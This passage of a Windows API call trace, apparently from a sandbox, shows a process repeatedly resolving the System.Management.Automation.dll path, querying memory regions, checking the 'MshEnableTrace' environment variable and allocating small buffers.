	[0149.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.793] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.799] CoTaskMemAlloc (cb=0x104) returned 0x1b7da9c0
	[0149.799] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.799] CoTaskMemFree (pv=0x1b7da9c0) 
	[0149.804] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.904] CoTaskMemAlloc (cb=0x104) returned 0x1b7da9c0
	[0149.904] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.904] CoTaskMemFree (pv=0x1b7da9c0) 
	[0149.907] CoTaskMemAlloc (cb=0x104) returned 0x1b7da9c0
	[0149.907] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.907] CoTaskMemFree (pv=0x1b7da9c0) 
	[0149.911] CoTaskMemAlloc (cb=0x104) returned 0x1b7da9c0
	[0149.911] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.911] CoTaskMemFree (pv=0x1b7da9c0) 
	[0149.919] CoTaskMemAlloc (cb=0x104) returned 0x1b7da9c0
	[0149.919] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.919] CoTaskMemFree (pv=0x1b7da9c0) 
	[0149.926] CoTaskMemAlloc (cb=0x104) returned 0x1b7da9c0
	[0149.926] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.926] CoTaskMemFree (pv=0x1b7da9c0) 
	[0149.927] CoTaskMemAlloc (cb=0x104) returned 0x1b7da9c0
	[0149.927] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.927] CoTaskMemFree (pv=0x1b7da9c0) 
	[0149.932] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0150.010] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0150.222] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0150.233] CoTaskMemAlloc (cb=0x104) returned 0x1b7da9c0
	[0150.233] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0150.233] CoTaskMemFree (pv=0x1b7da9c0) 
	[0150.442] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b7daad0
	[0150.444] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b7dabe0
	[0151.552] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.635] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.638] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.638] VirtualQuery (in: lpAddress=0x1c9fc0, lpBuffer=0x1cae80, dwLength=0x30 | out: lpBuffer=0x1cae80*(BaseAddress=0x1c9000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x7000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.680] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.681] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.681] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.682] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.682] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.683] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.684] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.684] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
